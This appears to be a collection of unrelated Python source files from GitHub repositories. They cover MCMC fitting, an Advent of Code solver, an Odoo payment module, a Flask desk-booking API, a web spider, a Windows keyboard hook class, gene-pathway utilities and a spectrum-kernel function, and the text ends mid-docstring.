inverse = range(bin_num2 - 1, -1, -1)
print("Bins:", ellip_bins)
p0 = numpy.random.uniform(-0.02, 0.02, ndim*nwalkers).reshape((nwalkers, ndim))
t1 = time.time()
with Pool(ncpus) as pool:
sampler = emcee.EnsembleSampler(nwalkers, ndim, ln_prob, args=[ellip, ellip_bins, bin_num2, inverse, x, x2, x3, x4, signal_num],pool=pool)
t2 = time.time()
pos, prob, state = sampler.run_mcmc(p0, step)
t3 = time.time()
print("Time: %.2f sec, %2.f sec"%(t2-t1, t3-t2))
img = Image_Plot(fig_x=16, fig_y=4)
img.subplots(ndim,1)
for i in range(nwalkers):
for j in range(ndim):
img.axs[j][0].plot(range(step),sampler.chain[i, :, j], color='grey',alpha=0.6)
img.axs[j][0].plot([0,step], [parameters[j], parameters[j]])
img.save_img("./pic/mcmc_walkers_nw_%d_stp_%d.png"%(nwalkers, step))
img.close_img()
samples = sampler.chain[:, 150:, :].reshape((-1, ndim))
print(samples.shape)
corner_fig = plt.figure(figsize=(10, 10))
fig = corner.corner(samples, labels=["$a_1$", "$a_2$", "$a_3$", "$a_4$", "$a_5$"], truths=[a1, a2, a3, a4, a5],
quantiles=[0.16, 0.5, 0.84], show_titles=True, title_fmt=".4f", title_kwargs={"fontsize": 12})
fig.savefig("./pic/mcmc_panel_nw_%d_stp_%d.png"%(nwalkers, step))
fit_params = []
pr = numpy.percentile(samples, [16, 50, 84], axis=0)
for i in range(ndim):
fit_params.append([pr[1,i], pr[2,i]-pr[1,i], pr[1,i]-pr[0,i]])
fit_params_ = map(lambda v: (v[1], v[2] - v[1], v[1] - v[0]),zip(*numpy.percentile(samples, [16, 50, 84], axis=0)))
print(fit_params)
for para in fit_params_:
print("%8.5f [%8.5f, %8.5f]"%(para[0], para[1], para[2]))
mcmc_shear, mcmc_sig = result_fun(fit_params, x)
result = numpy.zeros((6, signal_num))
result[0] = x[:,0]
result[1] = signals[:,0]
result[2] = fq_shear[0]
result[3] = fq_shear[1]
result[4] = mcmc_shear[:,0]
result[5] = mcmc_sig[:,0]
h5f = h5py.File("./result.hdf5","w")
h5f["/chain"] = sampler.chain
h5f["/result"] = result
h5f.close()
img = Image_Plot()
img.subplots(1,2)
img.axs[0][0].plot(x, signals, color='k', label="True")
img.axs[0][0].errorbar(x, mcmc_shear,mcmc_sig, label="MCMC Recovered")
img.axs[0][0].errorbar(x, fq_shear[0], fq_shear[1], label="FQ Recovered")
img.set_label(0,0,0, "g")
img.set_label(0,0,1, "X")
img.axs[0][0].legend()
img.axs[0][1].plot(x, 100*(signals[:,0] - mcmc_shear[:,0]), label="MCMC: True - Recovered")
img.axs[0][1].plot(x, 100*(signals[:,0] - fq_shear[0]), label="FQ: True - Recovered")
img.set_label(0,1,0, "$10^2 \\times\Delta g$")
img.set_label(0,1,1, "X")
img.axs[0][1].legend()
img.subimg_adjust(0, 0.25)
img.save_img("./pic/mcmc_recover_nw_%d_stp_%d.png"%(nwalkers, step))
img.close_img()
# for i in range(ndim):
# img = Image_Plot()
# img.subplots(1, 1)
# img.axs[0][0].hist(sampler.flatchain[:, 0], 100, histtype="step", color='k')
# img.save_img("mcmc_chisq.png")
# # img.show_img()
# img.close_img()
# pool.close() | hekunlie/astrophy-research | galaxy-galaxy lensing/mass_mapping/MCMC/MCMC.py | MCMC.py | py | 5,707 | python | en | code | 2 | github-code | 90 |
43333927906 | #!/usr/bin/env python3
import sys
import re
def parse(f):
p, v, a = [], [], []
for line in f:
nums = list(map(int, re.findall(r'-?[0-9]+', line)))
p += nums[:3]
v += nums[3:6]
a += nums[6:]
return p, v, a
def closest_after_steps(p, v, a, steps):
p = p.copy()
v = v.copy()
for step in range(steps):
for i in range(len(p)):
v[i] += a[i]
p[i] += v[i]
p = list(map(abs, p))
d = [sum(p[i:i + 3]) for i in range(0, len(p), 3)]
return d.index(min(d))
def not_collided_after_steps(p, v, a, steps):
p = p.copy()
v = v.copy()
collided = [False] * len(p)
for step in range(steps):
for i in range(len(p)):
if not collided[i]:
v[i] += a[i]
p[i] += v[i]
seen = {}
for i in range(0, len(p), 3):
if not collided[i]:
pos = tuple(p[i:i + 3])
seen.setdefault(pos, []).append(i)
for indices in seen.values():
if len(indices) > 1:
for i in indices:
collided[i] = True
collided[i + 1] = True
collided[i + 2] = True
return collided.count(False) // 3
# part 1
p, v, a = parse(sys.stdin)
print(closest_after_steps(p, v, a, 500))
# part 2
print(not_collided_after_steps(p, v, a, 500))
| taddeus/advent-of-code | 2017/20_particles.py | 20_particles.py | py | 1,400 | python | en | code | 2 | github-code | 90 |
9534766616 | # -*- coding: utf-8 -*-
from odoo import models, fields, api, _
class account_payment(models.Model):
_inherit = "account.payment"
check_amount_in_words_ec = fields.Char(string='Importe en letras', compute='_compute_importe_letras')
@api.one
@api.depends('check_amount_in_words')
def _compute_importe_letras(self):
text = self.check_amount_in_words.split(' and ')[0]
self.check_amount_in_words_ec = text + ' con ' + str(int((self.amount-int(self.amount))*100)) + '/100'
@api.multi
def do_print_checks(self):
if self:
check_layout = self[0].company_id.account_check_printing_layout
# A config parameter is used to give the ability to use this check format even in other countries than US, as not all the localizations have one
if check_layout != 'disabled' and (self[0].journal_id.company_id.country_id.code == 'EC' or bool(self.env['ir.config_parameter'].sudo().get_param('account_check_printing_force_ec_format'))):
self.write({'state': 'sent'})
return self.env.ref('l10n_ec_check_printing.%s' % check_layout).report_action(self)
return super(account_payment, self).do_print_checks()
move_line_rel_ids = fields.Many2many('account.move.line', 'payment_move_line_rel','payment_id','move_line_id', compute='_compute_move_line_rel_ids')
@api.depends('reconciled_invoice_ids')
def _compute_move_line_rel_ids(self):
move_lines = []
for payment in self:
print(payment.reconciled_invoice_ids)
for inv in payment.reconciled_invoice_ids:
move_ids = []
for reconcile in inv.payment_move_line_ids:
move_ids += [reconcile.move_id.id]
pml = self.env['account.move.line'].search([('move_id', 'in', move_ids)])
for pmt_move_line in pml:
# Valida si es una retefuente
if pmt_move_line.credit >0:
move_lines += [pmt_move_line.id]
self.move_line_rel_ids = move_lines | pragmatic-dev/l10n_ec_check_printing | l10n_ec_check_printing/models/account_payment.py | account_payment.py | py | 2,092 | python | en | code | 0 | github-code | 90 |
13631878719 | import docker
from docker.errors import NotFound
def remove_containers(containers):
docker_client = docker.from_env()
for container_name in containers:
try:
container = docker_client.containers.get(container_name)
container.stop()
container.remove(force=True)
except NotFound:
print(f'Container {container_name} already removed')
| mskvn/scoring_api | tests/integration/docker_utils.py | docker_utils.py | py | 404 | python | en | code | 0 | github-code | 90 |
38043773980 | from flask import Flask, jsonify, session, request, redirect, abort, make_response
from flask_restful import Resource, Api
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy import or_
from flask_cors import CORS, cross_origin
import uuid
from werkzeug.security import generate_password_hash, check_password_hash
import jwt
import datetime
from functools import wraps
import json
import os
import random
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://user:CiaoCiao88@localhost:3306/appprenotascrivanie'
app.config['SECRET_KEY'] = 'SECRET'
app.secret_key = 'superSecretKey'
SESSION_USERID = None
db = SQLAlchemy(app)
api = Api(app)
CORS(app)
USERLOGGED = False
# - fase di login (utente + password + reset password via mail)
# - TODO: resetPassword()
# DB MODELS
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(50), unique=True)
username = db.Column(db.String(50))
email = db.Column(db.String)
password = db.Column(db.String)
id_ruolo = db.Column(db.Integer)
attivo = db.Column(db.Boolean)
class Prenotazione(db.Model):
__tablename__ = 'prenotazione'
id = db.Column(db.Integer, primary_key=True)
numero_prenotazione = db.Column(db.Integer)
id_utente = db.Column(db.Integer)
data = db.Column(db.Date)
ora_inizio = db.Column(db.Time)
ora_fine = db.Column(db.Time)
id_postazione = db.Column(db.Integer)
class Postazione(db.Model):
__tablename__ = 'postazione'
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String)
id_piano = db.Column(db.Integer)
class Ruolo(db.Model):
__tablename__ = 'ruolo'
id = db.Column(db.Integer, primary_key=True)
ruolo = db.Column(db.String)
def token_required(f):
@wraps(f)
def decorated(*args, **kwargs):
token = None
# controlla se è presente x-access-token
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message':'token is missing'})
try:
data = jwt.decode(token, app.config['SECRET_KEY'])
current_user = User.query.filter_by(public_id=data['public_id']).first()
except:
return jsonify({'message': 'token is invalid'}), 401
return f(current_user, *args, **kwargs)
return decorated
# ROUTES
@app.route('/user', methods=['POST'])
@token_required
def signIn(current_user):
data = request.get_json()
hashed_password = generate_password_hash(data['password'], method='sha256')
newUser = User(public_id=str(uuid.uuid4()), username=data['username'], email=data['email'], password=hashed_password, id_ruolo=data['ruolo'], attivo=1)
db.session.add(newUser)
db.session.commit()
return jsonify({'message': 'new user created'})
@app.route('/users', methods=['GET'])
@token_required
def getAllUsers(current_user):
allUsers = User.query.all()
output = []
for user in allUsers:
user_data = {}
user_data['id'] = user.id
user_data['username'] = user.username
user_data['email'] = user.email
user_data['ruolo'] = user.id_ruolo
output.append(user_data)
return jsonify({'users': output})
# @app.route('/user-reservations', methods=['GET'])
# @token_required
# def getUserReservations(current_user):
# userReservations = Prenotazione.query.filter(Prenotazione.id_utente == current_user.id).all()
# output = []
# for reservation in userReservations:
# reservation_data = {}
# reservation_data['id'] = reservation.id
# reservation_data['numero_prenotazione'] = reservation.numero_prenotazione
# reservation_data['data'] = str(reservation.data)
# reservation_data['ora_inizio'] = str(reservation.ora_inizio)
# reservation_data['ora_fine'] = str(reservation.ora_fine)
# reservation_data['id_postazione'] = reservation.id_postazione
# output.append(reservation_data)
# return jsonify({'reservations': output})
@app.route('/user-reservations', methods=['GET'])
@token_required
def getUserReservations(current_user):
userReservationsNumber = db.engine.execute('SELECT distinct numero_prenotazione FROM prenotazione WHERE id_utente = %s', current_user.id)
output = []
for reservationNumber in userReservationsNumber:
res_data = {}
res_data['numero_prenotazione'] = str(reservationNumber[0])
res_data['postazioni'] = []
queryPostazioni = db.engine.execute('SELECT * FROM prenotazione WHERE numero_prenotazione = %s', reservationNumber)
for postazione in queryPostazioni:
res_data['id'] = postazione.id
res_data['postazioni'].append(str(postazione.id_postazione))
res_data['ora_inizio'] = str(postazione.ora_inizio)
res_data['ora_fine'] = str(postazione.ora_fine)
res_data['data'] = str(postazione.data)
output.append(res_data)
for resNumb in userReservationsNumber:
print(resNumb)
return jsonify({'reservations': output})
@app.route('/postazioni', methods=['POST'])
@token_required
def getPostazioniOccupate(current_user):
data = request.get_json()
# PRENDO TUTTE LE PRENOTAZIONI/POSTAZIONI OCCUPATE PER QUEL GIORNO IN QUELLA FASCIA ORARIA... teoricamente
# SELEZIONA SE LA PRENOTAZIONE INIZIA PRIMA DI DATA[ora_fine]
# SELEZIONA SE LA PRENOTAZIONE FINISCE DOPO DI DATA['ora_inizio]
# BUGGO : LA QUERY SELEZIONA ANCHE LE PRENOTAZIONI CHE FINISCONO ESATTAMENTE ALL'ORA A CUI LA NUOVA PRENOTAZIONE INIZIA
prenotazioniDelGiorno = Prenotazione.query.filter(
Prenotazione.data == data['dataPrenotazione'],
or_(Prenotazione.ora_inizio.between(data['oraInizio'], data['oraFine']),Prenotazione.ora_fine.between(data['oraInizio'], data['oraFine'])))
output = []
for prenotazione in prenotazioniDelGiorno:
prenotazione_data = {}
prenotazione_data['id_utente'] = prenotazione.id_utente
prenotazione_data['id_postazione'] = prenotazione.id_postazione
prenotazione_data['data'] = str(prenotazione.data)
prenotazione_data['ora_inizio'] = str(prenotazione.ora_inizio)
output.append(prenotazione_data)
return jsonify({'postazioni':output})
@app.route('/prenotazione', methods=['POST'])
@token_required
def addPrenotazione(current_user):
data = request.get_json()
print(data)
if data['dataPrenotazione'] == '' or data['oraInizio'] == '' or data['oraFine'] == '':
return jsonify({'error': 'Devi selezionare una data e un orario validi per prenotare'})
# generare un numero_prenotazione da assegnare alla prenotazione che essa sia singola o multipla
numero_prenotazione = str(random.randint(1,21)*random.randint(1,21))
# se è utente base
if(current_user.id_ruolo == 3):
newPrenotazione = Prenotazione(id_utente = current_user.id, numero_prenotazione=numero_prenotazione, data = data['dataPrenotazione'], ora_inizio = data['oraInizio'], ora_fine = data['oraFine'], id_postazione = data['postazione'])
db.session.add(newPrenotazione)
db.session.commit()
return jsonify({'success': 'Prenotazione effettuata'})
else:
for postazione in data['postazione']:
newPrenotazione = Prenotazione(id_utente = current_user.id, numero_prenotazione=numero_prenotazione, data = data['dataPrenotazione'], ora_inizio = data['oraInizio'], ora_fine = data['oraFine'], id_postazione = postazione)
db.session.add(newPrenotazione)
db.session.commit()
return jsonify({'success': 'Prenotazione multipla effettuata'})
@app.route('/prenotazione/<id_prenotazione>', methods=['GET'])
@token_required
def getOnePrenotazione(current_user, id_prenotazione):
prenotazione = Prenotazione.query.filter(Prenotazione.id == id_prenotazione)
if not prenotazione:
return jsonify({'message': 'No prenotazione found'})
print(prenotazione)
return jsonify({'results': prenotazione})
@app.route('/prenotazione/<num_prenotazione>', methods=['DELETE'])
@token_required
def deletePrenotazione(current_user, num_prenotazione):
toDelete = Prenotazione.query.filter(Prenotazione.numero_prenotazione == num_prenotazione).all()
if not toDelete:
return jsonify({'message' : 'No prenotazione found!'})
for pren in toDelete:
db.session.delete(pren)
db.session.commit()
return jsonify({'message': 'Prenotazione has been deleted'})
@app.route('/login')
def login():
auth = request.authorization
print(auth)
if not auth or not auth.username or not auth.password:
return make_response('NOT AUTH OR AUTH.USERNAME', 401, {'WWW-Authenticate' : 'Basic realm="login required"'})
user = User.query.filter(User.username == auth.username, User.attivo == 1).first()
if not user:
return make_response('Could not verify', 401, {'WWW-Authenticate' : 'Basic realm="login required"'})
if check_password_hash(user.password, auth.password):
token = jwt.encode({'public_id': user.public_id, 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes = 30)}, app.config['SECRET_KEY'])
user_data = {}
user_data['username'] = user.username
user_data['ruolo'] = user.id_ruolo
return jsonify({'token': token.decode('UTF-8'), 'user': user_data})
return make_response('Could not verify', 401, {'WWW-Authenticate' : 'Basic realm="login required"'})
if __name__ == '__main__':
app.run(port=5000) | michelecik/prenotaPostazioneUfficio | app.py | app.py | py | 9,983 | python | it | code | 0 | github-code | 90 |
43265905943 | import sys
from news_crawl.spiders.extensions_sitemap import ExtensionsSitemapSpider
class YomiuriCoJpSitemapSpider(ExtensionsSitemapSpider):
name: str = 'yomiuri_co_jp_sitemap'
allowed_domains: list = ['yomiuri.co.jp']
sitemap_urls: list = []
_domain_name: str = 'yomiuri_co_jp' # 各種処理で使用するドメイン名の一元管理
spider_version: float = 1.0
# sitemap_urlsに複数のサイトマップを指定した場合、その数だけsitemap_filterが可動する。その際、どのサイトマップか判別できるように処理中のサイトマップと連動するカウント。
_sitemap_urls_count: int = 0
# crawler_controllerコレクションへ書き込むレコードのdomain以降のレイアウト雛形。※最上位のKeyのdomainはサイトの特性にかかわらず固定とするため。
_sitemap_next_crawl_info: dict = {name: {}, }
def __init__(self, *args, **kwargs):
''' (拡張メソッド)
親クラスの__init__処理後に追加で初期処理を行う。
'''
super().__init__(*args, **kwargs)
# 単項目チェック(追加)
if not 'sitemap_term_days' in kwargs:
sys.exit('引数エラー:当スパイダー(' + self.name +
')の場合、sitemap_term_daysは必須です。')
# 以下のようなurlを生成する。
# 'https://www.yomiuri.co.jp/sitemap-pt-post-2021-05-04.xml',
# 'https://www.yomiuri.co.jp/sitemap-pt-post-2021-05-03.xml',
_sitemap_term_days_list = self.term_days_Calculation(
self._crawl_start_time, int(self.kwargs_save['sitemap_term_days']), '%Y-%m-%d')
self.sitemap_urls = [
'https://www.yomiuri.co.jp/sitemap-pt-post-%s.xml' % (i) for i in _sitemap_term_days_list]
self.logger.info('=== __init__ sitemap_urls 生成完了: %s',
self.sitemap_urls)
| pubranko/HatsuneMiku3 | news_crawl/spiders/yomiuri_co_jp_sitemap.py | yomiuri_co_jp_sitemap.py | py | 1,974 | python | ja | code | 0 | github-code | 90 |
70549545257 | import mysql.connector
from Manager import AccManage
from WRTools import ExcelHelp, PathHelp, LogHelper
# 建立数据库连接
cnx = mysql.connector.connect(
host=AccManage.mys['h'],
user=AccManage.mys['n'],
password=AccManage.mys['p'],
database="tender_info",
connection_timeout=180
)
def sql_write(sql, data):
try:
# 创建游标对象
print(f'write data:\n {data}')
cursor = cnx.cursor()
# 执行插入操作
cursor.executemany(sql, data)
# 提交事务
cnx.commit()
# 关闭游标和数据库连接
cursor.close()
except Exception as e:
LogHelper.write_log(log_file_name= PathHelp.get_file_path('WRTools', 'MySqlHelpLog.txt'), content=f'yjcx_recommended wirte error {e} {data}')
def sql_read(sql):
# 创建游标对象
cursor = cnx.cursor()
# 查询数据的SQL语句
query = sql
# 执行查询操作
cursor.execute(query)
# 获取查询结果
result = cursor.fetchall()
# 将结果转换为列表
data_list = list(result)
# 打印查询结果
# 关闭游标和数据库连接
cursor.close()
print(f'read data:\n {data_list}')
return data_list
def rts_render_A(data:list):
sql_str = "REPLACE INTO t_rts_tender_a(No, title_ru, starting_price, application_security, contract_security, status, published, apply_data, show_data, org_name, org_TinKpp, org_contact, cus_name, cus_TinKppReg, cus_contact, cus_address, detail_url, page, update_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
sql_write(sql_str, data)
def rts_render_B(data:list):
sql_str = "REPLACE INTO t_rts_tender_b(No, title_ru, starting_price, application_security, contract_security, status, published, apply_data, show_data, org_name, org_TinKpp, org_contact, cus_name, cus_TinKppReg, cus_contact, cus_address, detail_url, page, update_time) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
sql_write(sql_str, data)
if __name__ == "__main__":
rts_render_A()
| gree180160/YJCX_AI | WRTools/MySqlHelp_tender.py | MySqlHelp_tender.py | py | 2,108 | python | en | code | 0 | github-code | 90 |
17324280318 | from abc import ABC, abstractmethod
from .windows_messages import WinMessager
from threading import Event, local, Thread
from typing import Optional
from ctypes import wintypes
import ctypes
u32 = ctypes.windll.user32
k32 = ctypes.windll.kernel32
# Required for Windows callback events.
# When we set up a hook, we set our active class for that thread.
# During a callback event, we can then access that class.
local_data = local()
local_data.active_class = None
class Flags:
HC_ACTION = 0
hook_flag = 123
unhook_flag = 124
message_hook = 16
# This should not have two c_int types in it. Yet it the function we provide receives 3 arguments instead of all 4 of these.
HOOK_CALLBACK = ctypes.WINFUNCTYPE(ctypes.c_int, ctypes.c_int, wintypes.WPARAM, wintypes.LPARAM)
class WinHook(WinMessager):
"""
Handles Windows' HookEx management.
"""
def __init__(self, allow_key_propagation=False):
super().__init__()
self.allow_key_propagation = allow_key_propagation
if self.allow_key_propagation:
self.allow_key_propagation = False
print('TODO: Fix key_propagation (passive hook) on Windows.')
print('Key propagation has been set to False.')
self.is_hooked = Event()
# This variable is accessed from different threads.
# However, its access is synchronized using the self.is_hooked Event.
self._hook_error: Optional[int] = None
self._active_hook = None
self._hook_type = None
@abstractmethod
def _hook_callback(self, param, struct_pointer):
pass
def init_hook(self, hook_type):
if self.is_hooked.is_set():
raise EnvironmentError('Already hooked!')
self.start_windows_thread()
self._hook(hook_type)
if self._hook_error:
self.deinit_hook()
raise Exception('Error in an attempt to install hook. Error # {} {}'.format(
self._hook_error, ctypes.FormatError(self._hook_error)
)
)
def deinit_hook(self):
self.stop_windows_thread()
self._unhook()
def _hook(self, hook_type):
""" Registers a hook. """
self._hook_error = None
self._hook_type = hook_type
self._post_message(Flags.message_hook, Flags.hook_flag, Flags.hook_flag)
# Wait here for the other thread to initialize the hook.
self.is_hooked.wait(5)
if not self.is_hooked.is_set() or self._hook_error:
self.is_hooked.clear()
raise Exception('Unable to initialize hook. Error #', self._hook_error, k32.GetLastError())
def _windows_thread_grab(self, hook_type):
hook = u32.SetWindowsHookExW(hook_type, self._generic_callback, 0, 0)
if hook:
self._active_hook = hook
local_data.active_class = self
else:
self._grab_error = k32.GetLastError()
self.is_hooked.set()
def _unhook(self):
unhook_success = u32.UnhookWindowsHookEx(self._active_hook)
if unhook_success:
self._active_hook = None
self.is_hooked.clear()
else:
if self.is_hooked.is_set():
err = k32.GetLastError()
raise EnvironmentError('Unable to unhook from keyboard {}. Error # {} {}'.format(
self._active_hook, err, ctypes.FormatError(err)
))
def _windows_thread(self):
for get_msg, msg in super()._windows_thread():
if msg.message == Flags.message_hook and msg.wParam == Flags.hook_flag:
self._windows_thread_grab(self._hook_type)
self._hook_type = None
@staticmethod
@HOOK_CALLBACK
def _generic_callback(ncode, param2, struct_pointer):
if ncode != Flags.HC_ACTION or ncode < 0:
return u32.CallNextHookEx(0, ncode, param2, struct_pointer)
local_data.active_class._hook_callback(param2, struct_pointer)
if local_data.active_class.allow_key_propagation:
return u32.CallNextHookEx(0, ncode, param2, struct_pointer)
else:
return 1 | davis-b/keywatch | keywatch/windows/windows_hook.py | windows_hook.py | py | 3,620 | python | en | code | 0 | github-code | 90 |
15284184313 | ################## provide pathway gene list ##################
import pandas as pd
import numpy as np
import scipy.stats as stat
from collections import defaultdict
import os, time
## cancer geneset // PROVIDING IN GENE IDs
# MutSigDB Hallmark pathway genes
def hallmark_pathway():
output = defaultdict(list)
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/1_SubtypeSimilarity/data/MSigDB_gene_set'
f = open('%s/h.all.v6.1.symbols_2017_12_14.txt' %fi_directory, 'r')
for line in f.readlines():
line = line.strip().split('\t')
pathway, geneList = line[0], line[2:]
output[pathway] = geneList
f.close()
return output
def hallmark_pathway_uniprot():
# CONVERT GENE ID TO UNIPROT FOR HALLMARK GENE SETS
hallmark = hallmark_pathway()
hallmark_uniprot = defaultdict(set)
gene2uniprot = geneID2uniprot()
for pathway in hallmark:
for gene in hallmark[pathway]:
if gene in gene2uniprot:
uniprot = gene2uniprot[gene]
hallmark_uniprot[pathway].add(uniprot)
for pathway in hallmark_uniprot:
hallmark_uniprot[pathway] = list(hallmark_uniprot[pathway])
return hallmark_uniprot
def hallmark_pathway_total_geneList():
output = set()
hallmark = hallmark_pathway()
for pathway in hallmark:
for gene in hallmark[pathway]:
output.add(gene)
return list(output)
# CGC genes
def CGC_genes():
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/1_SubtypeSimilarity/data/'
df = pd.read_table('%s/Cancer_Genome_Census_allFri Mar 30 05_12_48 2018.tsv' %fi_directory)
geneList = list(set(df['Gene Symbol']))
return geneList
# REACTOME genes
def reactome_genes(): # provide in a dictionary
output = defaultdict(list)
output_list = []
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/co_work/propagate_and_NMF_cluster/data'
f = open('%s/MSigDB_50_hallmark_gene_set/msigdb.v6.1.symbols.gmt.txt' %fi_directory,'r')
for line in f.xreadlines():
line = line.strip().split('\t')
if 'REACTOME' in line[0]:
reactome = line[0]
output_list.append(reactome)
for i in range(2, len(line)):
gene = line[i]
output[reactome].append(gene)
f.close()
return output
def reactome_genes_uniprot():
output, reactome = defaultdict(list), reactome_genes()
gene2uniprot = geneID2uniprot()
for pathway in reactome:
for gene in reactome[pathway]:
if gene in gene2uniprot:
uniprot = gene2uniprot[gene]
if not uniprot in output[pathway]:
output[pathway].append(uniprot)
return output
# KEGG genes
def kegg_genes(): # provide in a dictionary
output = defaultdict(list)
output_list = []
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/co_work/propagate_and_NMF_cluster/data'
f = open('%s/MSigDB_50_hallmark_gene_set/msigdb.v6.1.symbols.gmt.txt' %fi_directory,'r')
for line in f.xreadlines():
line = line.strip().split('\t')
if 'KEGG' in line[0]:
kegg = line[0]
output_list.append(kegg)
for i in range(2, len(line)):
gene = line[i]
output[kegg].append(gene)
f.close()
return output
def kegg_genes_uniprot():
output, kegg = defaultdict(list), kegg_genes()
gene2uniprot = geneID2uniprot()
for pathway in kegg:
for gene in kegg[pathway]:
if gene in gene2uniprot:
uniprot = gene2uniprot[gene]
if not uniprot in output[pathway]:
output[pathway].append(uniprot)
return output
# ------------------------------------------------------------------------------------------------
## gene annotation conversion utilities
def convert_geneList_to_uniprotList( input_geneList ):
output = []
for gene in input_geneList:
if gene in gene2uniprot:
output.append(gene2uniprot[gene])
return list(set(output))
def convert_uniprotList_to_geneList( input_uniprotList ):
output = []
for uniprot in input_uniprotList:
if uniprot in uniprot2gene:
output.append(uniprot2gene[uniprot])
return list(set(output))
## gene annotation
# ensembl gene annotation
def annotation():
geneID2ensembl, ensembl2geneID = defaultdict(set), {}
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/1_SubtypeSimilarity/data'
df = pd.read_table('%s/2017_07_31_biomart_protein_coding_genes.txt' %fi_directory)
for i in range(len(df)):
geneID, ensembl = df['Gene name'][i], df['Gene stable ID'][i]
geneID2ensembl[ geneID ].add( ensembl )
ensembl2geneID[ ensembl ] = geneID
for geneID in geneID2ensembl:
geneID2ensembl[geneID] = list(geneID2ensembl[geneID])
return geneID2ensembl, ensembl2geneID
def ensembl2geneID():
output = {} # { ensembl : geneID }
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/8_hESC/data'
df = pd.read_table('%s/2017_07_31_biomart_protein_coding_genes.txt' %fi_directory)
for i in range(len(df)):
ensembl, gene = df['Gene stable ID'][i], df['Gene name'][i]
output[ensembl] = gene
return output
def geneID2uniprot():
output = {} # { gene ID : uniprot ID }
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/8_hESC/data'
df = pd.read_table('%s/uniprot_homoSapiens_multipleGeneName_20180802.tab' %fi_directory)
for i in range(len(df)):
uniprot, geneList = df['Entry'][i], df['Gene names'][i]
if pd.isnull(geneList) == False:
geneList = geneList.split()
for gene in geneList:
output[gene] = uniprot
return output
def uniprot2geneID():
output = {} # { uniprot ID : gene ID }
fi_directory = '/home/junghokong/PROJECT/bladder_cancer/code/8_hESC/data'
df = pd.read_table('%s/uniprot_homoSapiens_multipleGeneName_20180802.tab' %fi_directory)
for i in range(len(df)):
uniprot, geneList = df['Entry'][i], df['Gene names'][i]
if pd.isnull(geneList) == False:
geneList = geneList.split()
gene = geneList[0]
output[uniprot] = gene
return output
gene2uniprot, uniprot2gene = geneID2uniprot(), uniprot2geneID()
| SBIlab/SGI_cancer_recurrence_NIMO | code/scripts/transcriptome_methylome_signature_comparison/pathway_utilities.py | pathway_utilities.py | py | 6,576 | python | en | code | 0 | github-code | 90 |
18165747369 | n=int(input())
A = list(map(int, input().split()))
l = [0] * len(A)
ans=0
m=A[0]
for i in A:
if m>i:
ans = ans +(m-i)
else:
m=i
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02578/s754561965.py | s754561965.py | py | 162 | python | zh | code | 0 | github-code | 90 |
30972353166 | #coding:utf-8
"""
Propriété : maniere de manipuler/controler des attributs
principe d'encapsulation!
exemple ici: age = property(_getage, _setage, _delage,)
le menento c'est ce fichers
"""
class Humain:
""" CETTE CLASSE REPRESENTE UN HUMAIN. cmd pour : help() ici help(Humain) """
def __init__(self, nom, age, ):
self.nom = nom
self._age = age
def _getage(self):
if self._age <= 1:
return str(self._age) + " an ."#le meillur moyen cést de faire: "{} {}".format(self._age, "an")
else:
return str(self._age) + " ans ."#le meillur moyen cést de faire: "{} {}".format(self._age, "ans")
"""
try:
return self._age
except AttributeError :
print("L'age n'existe pas !")
def _setage(self,new_age):
if new_age <= 0:
self._age = 0
else :
self._age = new_age
def _delage(self ):
del self._age
"""
#property(<getter>,<setter>,<deleter>, helper)
age = property(_getage) #, _setage , _delage , "age variable qui definie l'age d'une humain")
#h1 = Humain(1001, 5 )
#print(h1.age)
#h1.age = -12
#print(h1.age)
#help(Humain)
h1 = Humain("jason champagne", 1)
print("{} a {}".format(h1.nom, h1.age))
| novenopatch/Youtube_formation | Jason_champagne/13_propriété/propriété.py | propriété.py | py | 1,386 | python | fr | code | 1 | github-code | 90 |
2101519207 | import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.preprocessing import LabelEncoder
def phi(x, y, l, j_x, j_y, d):
"""Calculate spectrum features for spectrum kernel.
phi is a mapping of a row of matrix x into a |alphabet|^l
dimensional feature space. For each sequence in x,
each dimension corresponds to one of the |alphabet|^l
possible strings s of length l and is the count of
the number of occurrance of s in x.
Paramters
---------------------------------------------------
x : string
a row of the data matrix
y : string
a row of the data matrix
l : int, default 3
number of l-mers (length of 'word')
j_x : int
start position of sequence in x
j_y : int
start position of sequence in y
d : int
the length of analysed sequence
j + d is end position of sequence
Returns
----------------------------------------------------
embedded_x: array
1 * num_embedded_features
embedded_y: array
1 * num_embedded_features
"""
sentences = []
sequence_x= x[j_x:j_x + d]
words_x = [sequence_x[a:a+l] for a in range(len(sequence_x) - l + 1)]
sentence_x = ' '.join(words_x)
sentences.append(sentence_x)
sequence_y= y[j_y:j_y + d]
words_y = [sequence_y[a:a+l] for a in range(len(sequence_y) - l + 1)]
sentence_y = ' '.join(words_y)
sentences.append(sentence_y)
cv = CountVectorizer(analyzer='word',token_pattern=u"(?u)\\b\\w+\\b")
#cv = CountVectorizer()
embedded = cv.fit_transform(sentences).toarray()
#print(embedded)
return embedded[0], embedded[1]
def inverse_label(x):
"""convert_to_string
"""
le = LabelEncoder()
bases = ['A','C','G','T']
le.fit(bases)
int_x = []
for i in x:
int_x.append(int(i))
#print(int_x)
inverse_x = le.inverse_transform(int_x)
inverse_x = ''.join(e for e in inverse_x)
#print(inverse_x)
return inverse_x
def spectrum_kernel_pw(x, y=None, gamma = 1.0, l = 3, j_x = 0, j_y = 0, d = None):
"""
Compute the spectrum kernel between x and y:
k_{l}^{spectrum}(x, y) = <phi(x), phi(y)>
for each pair of rows x in x and y in y.
